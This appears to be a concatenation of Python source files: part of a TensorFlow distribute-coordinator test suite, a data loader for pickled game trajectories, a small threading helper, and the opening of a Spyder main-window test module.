return cluster_spec
def _in_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
xs = []
expected = 0.0
for i in range(context.num_workers):
with ops.device("/job:worker/task:%d" % i):
x = variable_scope.get_variable("x_%d" % i, initializer=10.0)
x_add = x.assign_add(float(i))
xs.append(x_add)
expected += i + 10.0
with ops.device("/job:worker/task:0"):
result = math_ops.add_n(xs)
variables.global_variables_initializer().run()
result_value = sess.run(result)
self.assertEqual(result_value, expected)
if result_value == expected:
self._result_correct += 1
def _run_coordinator_in_thread(self, worker_fn, strategy, **kwargs):
t = threading.Thread(
target=distribute_coordinator.run_distribute_coordinator,
args=(worker_fn, strategy),
kwargs=kwargs)
t.start()
return t
def _run_multiple_coordinator_in_threads(self, worker_fn, strategy,
cluster_spec, **kwargs):
threads = {}
for task_type in cluster_spec.keys():
threads[task_type] = []
for task_id in range(len(cluster_spec[task_type])):
t = self._run_coordinator_in_thread(
worker_fn,
strategy,
cluster_spec=cluster_spec,
task_type=task_type,
task_id=task_id,
**kwargs)
threads[task_type].append(t)
return threads
def _between_graph_worker_fn(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with self._test_session(target=context.master_target) as sess:
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using resource variable will make
# the test flaky.
x = variable_scope.get_variable(
"x", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable(
"y", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
if context.is_chief:
variables.global_variables_initializer().run()
# Synchronize workers after initializaton.
if context.has_barrier:
context.wait_for_other_workers()
else:
while True:
uninit_vars = sess.run(variables.report_uninitialized_variables())
# pylint: disable=g-explicit-length-test
if len(uninit_vars) == 0:
break
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _between_graph_with_monitored_session(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
with ops.device("/job:ps/task:0"):
# TODO(yuefengz): investigate why not using resource variable will make
# the test flaky.
x = variable_scope.get_variable("x", initializer=10.0, use_resource=True)
with ops.device("/job:ps/task:1"):
y = variable_scope.get_variable("y", initializer=20.0, use_resource=True)
x_add = x.assign_add(2.0)
y_sub = y.assign_sub(2.0)
train_op = control_flow_ops.group([x_add, y_sub])
# The monitored session will run init or ready ops.
with monitored_session.MonitoredSession() as sess:
sess.run(train_op)
# Synchronize workers after one step to make sure they all have finished
# training.
if context.has_barrier:
context.wait_for_other_workers()
else:
self._barrier.wait()
x_val, y_val = sess.run([x, y])
self.assertEqual(x_val, 16.0)
self.assertEqual(y_val, 14.0)
if x_val == 16.0 and y_val == 14.0:
with self._lock:
self._result_correct += 1
def _dump_worker_context(self, strategy):
"""Dumps the propoerties of each worker context.
It dumps the context properties to a dict mapping from task_type to a list
of tuples of master_target, num_workers, is_chief and distribute_mode, where
the list is indexed by the task_id.
Args:
strategy: a `DistributionStrategy` object.
"""
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._worker_context:
self._worker_context[task_type] = []
while len(self._worker_context[task_type]) <= task_id:
self._worker_context[task_type].append(None)
self._worker_context[task_type][task_id] = (context.master_target,
context.num_workers,
context.is_chief,
context.distributed_mode)
def _dump_strategy_property(self, strategy):
context = distribute_coordinator_context.get_current_worker_context()
self.assertTrue(context is not None)
self.assertEqual(context._strategy.should_init, strategy.should_init)
self.assertEqual(context.should_checkpoint, strategy.should_checkpoint)
self.assertEqual(context.should_save_summary, strategy.should_save_summary)
task_type = str(context.task_type)
task_id = context.task_id or 0
with self._lock:
if task_type not in self._strategy_property:
self._strategy_property[task_type] = []
while len(self._strategy_property[task_type]) <= task_id:
self._strategy_property[task_type].append(None)
self._strategy_property[task_type][task_id] = (
context._strategy.should_init, context.should_checkpoint,
context.should_save_summary)
def _run_mock_std_server(self,
session_config=None,
cluster_spec=None,
task_type=None,
task_id=None,
rpc_layer=None,
environment=None):
task_type = str(task_type)
task_id = task_id or 0
with self._lock:
if task_type not in self._std_servers:
self._std_servers[task_type] = []
while len(self._std_servers[task_type]) <= task_id:
self._std_servers[task_type].append(None)
server = MockServer()
self._std_servers[task_type][task_id] = server
return server
class DistributeCoordinatorTestStandaloneMode(DistributeCoordinatorTestBase):
def testInGraphStandaloneMode(self):
"""Test it runs in-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
"""Test it runs between-graph replication in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
"""Test monitored session in standalone client mode."""
distribute_coordinator.run_distribute_coordinator(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS, False, True))
def testBetweenGraphStrategyProperties(self):
# Dumps properties of the strategy objects.
distribute_coordinator.run_distribute_coordinator(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec=self._cluster_spec)
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=self._cluster_spec)
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS, True, True))
def testLocalContext(self):
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=None)
# There is only a "None" task.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], ("", 0, True, False))
def testBetweenGraphContextWithChief(self):
# Adds a chief node, so there are NUM_WORKERS + 1 workers in total.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[CHIEF] = ["fake_chief"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec=cluster_spec,
rpc_layer="grpc")
# There are one CHIEF and three workers.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue(CHIEF in self._worker_context)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[CHIEF]), 1)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context[CHIEF][0],
("grpc://fake_chief", 4, True, True))
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(self._workers[0].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(self._workers[1].target), NUM_WORKERS + 1, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(self._workers[2].target), NUM_WORKERS + 1, False, True))
def testInGraphContextWithEval(self):
# Adds a EVALUATOR job.
cluster_spec = copy.deepcopy(self._cluster_spec)
cluster_spec[EVALUATOR] = ["fake_evaluator"]
# Dumps the task contexts to the self._worker_context dict.
distribute_coordinator.run_distribute_coordinator(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec=cluster_spec,
rpc_layer=None)
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0], (_strip_protocol(
_bytes_to_str(self._workers[0].target)), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
("fake_evaluator", 3, True, False))
class DistributeCoordinatorTestInpendentWorkerMode(
DistributeCoordinatorTestBase):
def testInGraph(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
threads = self._run_multiple_coordinator_in_threads(
self._in_graph_worker_fn,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER)
threads[WORKER][0].join()
self.assertEqual(self._result_correct, 1)
def testBetweenGraph(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_worker_fn,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphWithMonitoredSession(self):
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, num_ps=NUM_PS)
threads = self._run_multiple_coordinator_in_threads(
self._between_graph_with_monitored_session,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# Each finished worker will increment self._result_correct.
self.assertEqual(self._result_correct, NUM_WORKERS)
def testBetweenGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and three such tasks.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue(WORKER in self._worker_context)
self.assertEqual(len(self._worker_context[WORKER]), NUM_WORKERS)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context[WORKER][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
self.assertEqual(
self._worker_context[WORKER][1],
(_bytes_to_str(cluster_spec[WORKER][1]), NUM_WORKERS, False, True))
self.assertEqual(
self._worker_context[WORKER][2],
(_bytes_to_str(cluster_spec[WORKER][2]), NUM_WORKERS, False, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertFalse(self._std_servers[WORKER][1].joined)
self.assertFalse(self._std_servers[WORKER][2].joined)
def testBetweenGraphStrategyProperties(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps properties of the strategy objects.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_strategy_property,
MockStrategy(between_graph=True, should_init=True),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only one type of task and there three such tasks.
self.assertEqual(len(self._strategy_property), 1)
self.assertTrue(WORKER in self._strategy_property)
self.assertEqual(len(self._strategy_property[WORKER]), NUM_WORKERS)
# Check whether each task has the right properties of should_init,
# should_checkpoint and should_save_summary.
self.assertEqual(self._strategy_property[WORKER][0], (True, True, True))
self.assertEqual(self._strategy_property[WORKER][1], (True, False, False))
self.assertEqual(self._strategy_property[WORKER][2], (True, False, False))
def testInGraphContext(self):
cluster_spec = self._create_cluster_spec(num_workers=NUM_WORKERS)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
# There is only a "None" task in the dumped task context.
self.assertEqual(len(self._worker_context), 1)
self.assertTrue("None" in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(
self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), NUM_WORKERS, True, True))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 1)
self.assertTrue(WORKER in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
def testInGraphContextWithEval(self):
# Adds a EVALUATOR job.
cluster_spec = self._create_cluster_spec(
num_workers=NUM_WORKERS, has_eval=True)
# Dumps the task contexts and std server arguments.
with test.mock.patch.object(distribute_coordinator, "_run_std_server",
self._run_mock_std_server):
threads = self._run_multiple_coordinator_in_threads(
self._dump_worker_context,
MockStrategy(between_graph=False),
cluster_spec,
mode=INDEPENDENT_WORKER,
rpc_layer=None)
for task_id in range(NUM_WORKERS):
threads[WORKER][task_id].join()
threads[EVALUATOR][0].join()
# There are one "None" task and one EVALUATOR task.
self.assertEqual(len(self._worker_context), 2)
self.assertTrue("None" in self._worker_context)
self.assertTrue(EVALUATOR in self._worker_context)
self.assertEqual(len(self._worker_context["None"]), 1)
self.assertEqual(len(self._worker_context[EVALUATOR]), 1)
# Check whether each task has the right master_target, num_workers, is_chief
# and distributed_mode.
self.assertEqual(self._worker_context["None"][0],
(_bytes_to_str(cluster_spec[WORKER][0]), 3, True, True))
self.assertEqual(self._worker_context[EVALUATOR][0],
(cluster_spec[EVALUATOR][0], 3, True, False))
# Make sure each worker runs a std server.
self.assertEqual(len(self._std_servers), 2)
self.assertTrue(WORKER in self._std_servers)
self.assertTrue(EVALUATOR in self._std_servers)
self.assertEqual(len(self._std_servers[WORKER]), 3)
self.assertEqual(len(self._std_servers[EVALUATOR]), 1)
self.assertFalse(self._std_servers[WORKER][0].joined)
self.assertTrue(self._std_servers[WORKER][1].joined)
self.assertTrue(self._std_servers[WORKER][2].joined)
self.assertFalse(self._std_servers[EVALUATOR][0].joined)
def testRunStdServerInGoogleEnvironment(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["localhost:0"]}
tf_config = {"cluster": cluster_spec, "environment": "google"}
joined = [False]
def _fake_sleep(_):
joined[0] = True
original_sys_exit(0)
def _thread_fn(cluster_spec):
distribute_coordinator.run_distribute_coordinator(
None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
time, "sleep", _fake_sleep):
t = threading.Thread(target=_thread_fn, args=(cluster_spec,))
t.start()
t.join()
self.assertTrue(joined[0])
def testRpcLayerEnvironmentVariable(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec, "rpc_layer": "cake"}
rpc_layer_from_coordinator = [None]
def _run_mock_server(cluster_spec=None,
task_type=None,
task_id=None,
session_config=None,
rpc_layer=None,
environment=None):
del cluster_spec, task_type, task_id, session_config, environment
rpc_layer_from_coordinator[0] = rpc_layer
return MockServer()
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server", _run_mock_server):
distribute_coordinator.run_distribute_coordinator(
None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="ps",
task_id=0)
self.assertEqual(rpc_layer_from_coordinator[0], "cake")
class StrategyConfigureTest(test.TestCase):
def setUp(self):
self._device_filters = []
self._intra_op_parallelism_threads = None
self._inter_op_parallelism_threads = None
super(StrategyConfigureTest, self).setUp()
def _dump_device_filters(self, *args, **kwargs):
session_config = kwargs.get("session_config", None)
self._device_filters.extend(session_config.device_filters)
self._intra_op_parallelism_threads = (
session_config.intra_op_parallelism_threads)
self._inter_op_parallelism_threads = (
session_config.inter_op_parallelism_threads)
return MockServer()
def _worker_fn(self, strategy):
worker_context = distribute_coordinator_context.get_current_worker_context()
session_config = worker_context._session_config
self._device_filters.extend(session_config.device_filters)
self._intra_op_parallelism_threads = (
session_config.intra_op_parallelism_threads)
self._inter_op_parallelism_threads = (
session_config.inter_op_parallelism_threads)
return MockServer()
def test_session_config_in_std_server(self):
cluster_spec = {"worker": ["fake_worker"], "ps": ["fake_ps"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict(
"os.environ",
{"TF_CONFIG": json.dumps(tf_config)}), test.mock.patch.object(
distribute_coordinator, "_run_std_server",
self._dump_device_filters):
distribute_coordinator.run_distribute_coordinator(
lambda _: None,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="worker",
task_id=0)
self.assertEqual(self._intra_op_parallelism_threads, 1)
self.assertEqual(self._inter_op_parallelism_threads, 0)
def test_session_config_in_session_creator(self):
cluster_spec = {"worker": ["localhost:0"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
distribute_coordinator.run_distribute_coordinator(
self._worker_fn,
MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="worker",
task_id=0)
self.assertEqual(self._device_filters, ["/job:worker/task:0", "/job:ps"])
self.assertEqual(self._intra_op_parallelism_threads, 2)
self.assertEqual(self._inter_op_parallelism_threads, 0)
def test_eval_strategy_configure(self):
cluster_spec = {"evaluator": ["localhost:0"]}
tf_config = {"cluster": cluster_spec}
with test.mock.patch.dict("os.environ",
{"TF_CONFIG": json.dumps(tf_config)}):
distribute_coordinator.run_distribute_coordinator(
lambda _: None,
MockStrategy(between_graph=False),
eval_fn=self._worker_fn,
eval_strategy=MockStrategy(between_graph=True),
mode=INDEPENDENT_WORKER,
cluster_spec=cluster_spec,
task_type="evaluator",
task_id=0)
self.assertEqual(self._device_filters, ["/job:somejob"])
self.assertEqual(self._intra_op_parallelism_threads, 0)
self.assertEqual(self._inter_op_parallelism_threads, 2)
if __name__ == "__main__":
# TODO(yuefengz): find a smart way to terminite std server threads.
with test.mock.patch.object(sys, "exit", os._exit):
test.main()
|
data.py | import atexit
import itertools
import multiprocessing as mp
import os
import pickle
import random
import zlib
import numpy as np
import tree
import stats
import utils
def train_test_split(data_dir, subset=None, test_ratio=.1):
if subset:
filenames = stats.SUBSETS[subset]()
filenames = [name + '.pkl' for name in filenames]
else:
filenames = sorted(os.listdir(data_dir))
# reproducible train/test split
rng = random.Random()
test_files = rng.sample(filenames, int(test_ratio * len(filenames)))
test_set = set(test_files)
train_files = [f for f in filenames if f not in test_set]
train_paths = [os.path.join(data_dir, f) for f in train_files]
test_paths = [os.path.join(data_dir, f) for f in test_files]
return train_paths, test_paths
def game_len(game):
return len(game[1])
class TrajectoryManager:
# TODO: manage recurrent state? can also do it in the learner
def __init__(self, source):
self.source = source
self.game = None
def find_game(self, n):
while True:
game = next(self.source)
if game_len(game) >= n: break
self.game = game
self.frame = 0
def grab_chunk(self, n):
# TODO: write a unit test for this
needs_reset = self.game is None or game_len(self.game) - self.frame < n
if needs_reset:
self.find_game(n)
new_frame = self.frame + n
slice = lambda a: a[self.frame:new_frame]
chunk = tree.map_structure(slice, self.game)
self.frame = new_frame
return chunk, needs_reset
def swap_players(game):
old_players = game['player']
new_players = {1: old_players[2], 2: old_players[1]}
new_game = game.copy()
new_game['player'] = new_players
return new_game
def detect_repeated_actions(controllers):
"""Labels actions as repeated or not.
Args:
controllers: A nest of numpy arrays with shape [T].
Returns:
A boolean numpy array `repeats` with shape [T-1].
repeats[i] is True iff controllers[i+1] equals controllers[i]
"""
is_same = lambda a: a[:-1] == a[1:]
repeats = tree.map_structure(is_same, controllers)
repeats = np.stack(tree.flatten(repeats), -1)
repeats = np.all(repeats, -1)
return repeats
def indices_and_counts(repeats, max_repeat=15):
"""Finds the indices and counts of repeated actions.
`repeats` is meant to be produced by `detect_repeated_actions`
If `controllers` is [a, a, a, c, b, b], then
repeats = [T, T, F, F, T]
indices = [2, 3, 5]
counts = [2, 0, 1]
Args:
repeats: A boolean array with shape [T-1].
max_repeat: Maximum number of consecutive repeated actions before a repeat
is considered a non-repeat.
Returns:
A tuple (indices, counts).
"""
indices = []
counts = []
count = 0
for i, is_repeat in enumerate(repeats):
if not is_repeat or count == max_repeat:
indices.append(i) # index of the last repeated action
counts.append(count)
count = 0
else:
count += 1
indices.append(len(repeats))
counts.append(count)
return np.array(indices), np.array(counts)
def compress_repeated_actions(game, embed_controller, max_repeat):
controllers = game['player'][1]['controller_state']
controllers = embed_controller.map(lambda e, a: e.preprocess(a), controllers)
repeats = detect_repeated_actions(controllers)
indices, counts = indices_and_counts(repeats, max_repeat)
compressed_game = tree.map_structure(lambda a: a[indices], game)
return compressed_game, counts
class DataSource:
def __init__(
self,
filenames,
compressed=True,
batch_size=64,
unroll_length=64,
max_action_repeat=15,
# preprocesses (discretizes) actions before repeat detection
embed_controller=None,
):
self.filenames = filenames
self.batch_size = batch_size
self.unroll_length = unroll_length
self.compressed = compressed
self.max_action_repeat = max_action_repeat
self.embed_controller = embed_controller
trajectories = self.produce_trajectories()
self.managers = [
TrajectoryManager(trajectories)
for _ in range(batch_size)]
def produce_trajectories(self):
raw_games = self.produce_raw_games()
yield from map(self.process_game, raw_games)
def process_game(self, game):
return compress_repeated_actions(
game, self.embed_controller, self.max_action_repeat)
def produce_raw_games(self):
"""Raw games without post-processing."""
for path in itertools.cycle(self.filenames):
with open(path, 'rb') as f:
obj_bytes = f.read()
if self.compressed:
obj_bytes = zlib.decompress(obj_bytes)
game = pickle.loads(obj_bytes)
yield game
yield swap_players(game)
def __next__(self):
return utils.batch_nest(
[m.grab_chunk(self.unroll_length) for m in self.managers])
def produce_batches(data_source_kwargs, batch_queue):
data_source = DataSource(**data_source_kwargs)
while True:
batch_queue.put(next(data_source))
class DataSourceMP:
def __init__(self, buffer=4, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
self.batch_queue = mp.Queue(buffer)
self.process = mp.Process(
target=produce_batches, args=(kwargs, self.batch_queue))
self.process.start()
atexit.register(self.batch_queue.close)
atexit.register(self.process.terminate)
def __next__(self):
return self.batch_queue.get()
|
abstract.py | """
Multi-threading with GIL in python is useful for blocking I/O
# Threads to make multiple system calls in parallel
Threading with the system calls will all run in parallel from multiple Python
threads even though they're limited by the GIL. The GIL prevents my Python code
from running in parallel, but it has no negative effect on system calls.
This works because Python threads release the GIL just before they make system
calls and reacquire the GIL as soon as the system calls are done.
"""
import threading
from util.commons_util.decorators.classes import *
__author__ = 'Danyang'
def print_msg(name, msg):
print "%s says: %s" % (name, msg)
class AbstractThread(threading.Thread):
"""
e.g.
thread = Thread(target=some_func)
thread.start()
threat.join()
"""
@Override(threading.Thread)
def __init__(self, name, production=False):
super(AbstractThread, self).__init__()
self.name = name
self.production = production
def print_msg(self, msg):
print_msg(self.name, msg) |
test_mainwindow.py | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
import os
import os.path as osp
import psutil
import re
import shutil
import sys
import tempfile
from textwrap import dedent
import threading
import traceback
from unittest.mock import Mock
import uuid
# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT_VERSION
from qtpy.QtCore import Qt, QTimer
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage, QTextCursor
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QInputDialog,
QLineEdit, QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.api.plugins import Plugins
from spyder.app import start
from spyder.config.base import (
get_home_dir, get_conf_path, get_module_path, running_in_ci)
from spyder.config.manager import CONF
from spyder.dependencies import DEPENDENCIES
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, qbytearray_to_str, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import remove_backslashes
from spyder.utils.clipboard_helper import CLIPBOARD_HELPER
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
def register_fake_entrypoints():
"""
Create entry points distribution to register elements:
* Completion providers (Fallback, Shippets, LSP)
"""
# Completion providers
fallback = pkg_resources.EntryPoint.parse(
'fallback = spyder.plugins.completion.providers.fallback.provider:'
'FallbackProvider'
)
snippets = pkg_resources.EntryPoint.parse(
'snippets = spyder.plugins.completion.providers.snippets.provider:'
'SnippetsProvider'
)
lsp = pkg_resources.EntryPoint.parse(
'lsp = spyder.plugins.completion.providers.languageserver.provider:'
'LanguageServerProvider'
)
# Create a fake Spyder distribution
d = pkg_resources.Distribution(__file__)
# Add the providers to the fake EntryPoints
d._ep_map = {
'spyder.completions': {
'fallback': fallback,
